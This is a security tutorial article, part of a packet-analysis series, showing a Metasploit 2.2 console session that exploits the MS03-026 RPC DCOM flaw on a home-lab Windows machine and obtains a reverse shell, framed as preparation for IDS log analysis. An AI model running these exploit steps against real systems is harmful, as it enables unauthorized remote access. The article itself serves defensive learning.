Packet analysis tools and methodology (Part 3)

If you would like to read the other articles in this series please check out:

On the offensive with Metasploit!

We have seen over the course of the past two articles that there is a variety of port scans one can accomplish, via some well known tools. Also we have covered some of the better known programs, that network security analysts use in an attempt to secure their respective networks. This all leads us to a tool that you may have read about before in an article of mine; Metasploit Framework. Due to its many exploits, payloads, and other advanced features, this tool is quickly gaining in popularity. It is not only popular with security professionals, but also with some other elements of the computer world who do not have your best interests at heart.

The malicious hackers who have adopted this tool due to its relative ease of use, and powerful features have a powerful weapon at their disposal. Though it should be evident to them that with each exploit in the framework, there is a ready-made intrusion detection signature built into it. When  this tool was designed the creators of it, HDM, and spoonm were ethical enough to insert an ascii signature that intrusion detection vendors could easily build a signature around. That way this tool is easily detectable when seen by an IDS. Over the course of this article several examples of this ascii signature will be shown.

In the interests of better understanding how your networks could be compromised, we will attack a computer in my home lab. Various attacks will be shown both successful and unsuccessful. Shown as well will be the syntax usage for one of the attacks. Learning to use this tool is relatively easy. One needs to remember as well that there are only so many ways to compromise a computer. The great majority of them continue to evolve around application layer protocols such as HTTP, and FTP. That is due to the simple reason that these protocols must be accessible through the firewall for them to be used. It would be hard to target a protocol used by the operating system for it to run reliably if it does not listen for inbound connections. In other words you cannot really target something that is not listening.

Is anyone listening?

The following examples that we will use all have listening sockets. These services will be RPC, LSASS, and HTTP. We will also use some exploits that will purposely fail, for there is no service listening to be exploited. That way we will be able to see, at the packet level, what it looks like. It is important to recognize not only a successful intrusion attempt, but also an unsuccessful one. So with that in mind, let’s set up our first exploit to be done via Metasploit. If you have read some of my earlier articles you will realize that Metasploit can be used in either win32, or linux. I will show the sequence of events done to configure Metasploit for the first exploit so that all you need to do is emulate it for the remainder of the exploits. Please see the below noted for detailed instructions on how to use this program.

[email protected]:~/framework-2.2> ./msfconsole

                __.                       .__.        .__. __.
  _____   _____/  |______    ____________ |  |   ____ |__|/  |_
 /     \_/ __ \   __\__  \  /  ___/\____ \|  |  /  _ \|  \   __\
|  Y Y  \  ___/|  |  / __ \_\___ \ |  |_> >  |_(  <_> )  ||  |
|__|_|  /\___  >__| (____  /____  >|   __/|____/\____/|__||__|
      \/     \/  v2.2    \/     \/ |__|
+ — –=[ msfconsole v2.2 [33 exploits – 33 payloads]

msf >

((Listed above is how you invoke the msfconsole within the framework directory))

msf > show exploits

Metasploit Framework Loaded Exploits

Credits                     Metasploit Framework Credits
afp_loginext              AppleFileServer LoginExt PathName Buffer Overflow
apache_chunked_win32      Apache Win32 Chunked Encoding
blackice_pam_icq          ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec               DistCC Daemon Command Execution
exchange2000_xexch50      Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail                IA WebMail 3.x Buffer Overflow
icecast_header            Icecast (<= 2.0.1) Header Overwrite (win32)
iis50_nsiislog_post       IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow    IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll        IIS 5.0 WebDAV ntdll.dll Overflow

((typing in the above “show exploits” will give you a list of available exploits, this is only a partial list for I have snipped out the bulk for brevities sake))

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 >  

((once you have decided which exploit to use you will type “use” followed by the actual exploit name as it appears just like the above noted example))

msf msrpc_dcom_ms03_026 > show options

Exploit Options

 Exploit:     Name      Default    Description
——–  ——  ——-  ——————
required  RHOST               The target address
required  RPORT   135      The target port

Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026 >        

((typing in the “show options” command will give you a partial list of options you will need to fill in like LHOST ie: localhost or your attacking computers IP address and RHOST the victim computers IP address))

msf msrpc_dcom_ms03_026 > set RHOST
msf msrpc_dcom_ms03_026 > set LHOST
msf msrpc_dcom_ms03_026 >        

((you will now set the options as shown above))

msf msrpc_dcom_ms03_026 > show payloads

Metasploit Framework Usable Payloads

win32_adduser              Windows Execute net user /ADD
win32_bind               Windows Bind Shell
win32_bind_dllinject     Windows Bind DLL Inject
win32_bind_stg           Windows Staged Bind Shell
win32_bind_stg_upexec    Windows Staged Bind Upload/Execute
win32_bind_vncinject     Windows Bind VNC Server DLL Inject
win32_exec               Windows Execute Command
win32_reverse            Windows Reverse Shell
win32_reverse_dllinject  Windows Reverse DLL Inject
win32_reverse_stg        Windows Staged Reverse Shell
win32_reverse_stg_ie     Windows Reverse InlineEgg Stager
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject  Windows Reverse VNC Server DLL Inject

((typing in “show payloads” will give you an extensive list of available payloads to attack to the exploit, and this is where Metasploit really shines above other such tools))

msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) >          

((once you have picked your payload type enter it as seen above))

msf msrpc_dcom_ms03_026(win32_reverse) > show options
Exploit and Payload Options

Exploit: Name Default Description
——– —— ————- ——————
required RHOST The target address
required RPORT 135 The target port
Payload: Name Default Description
——–  ——– ————- ——————————————
optional EXITFUNC seh Exit technique: “process”, “thread”, “seh”
required LHOST Local address to receive connection
required LPORT 4321 Local port to receive connection

Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_reverse) >             

((when you type again “show options” you will see that they have all been filled in with the information required))

msf msrpc_dcom_ms03_026(win32_reverse) > set TARGET 0

((the last thing I do is set the target field which encompasses pretty much all win32 operating systems as seen above))

msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x80b3
[*] Got connection from
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

((lastly as seen above I type in “exploit” to launch the actual itself, and I indeed do the get the reverse shell prompt as seen above))

What this has shown us is that a tool as powerful as Metasploit Framework is relatively easy to use. This really is helpful in letting us recognize what certain exploits look like at the packet level. I have said it before and I will say it again, you will always need to refer to the actual packets themselves to ascertain if a system breach has occurred.

Due to this, it is very helpful to you if you can recognize an exploit for what it is. There is no better way to do that then to actually pull some off yourself in a lab environment. I have gone ahead and run several other exploits for the last part of this article series. In the next, and last part, we will use some of the tools we visited earlier. These tools will help us investigate the binary log that I will have generated for you. For in the last part of this article series we will parse the binary log file through snort, and snortsnarf. That will give us a friendly html file to investigate the snort output. Till then!

If you would like to read the other articles in this series please check out:

Leave a Comment

Your email address will not be published.

Scroll to Top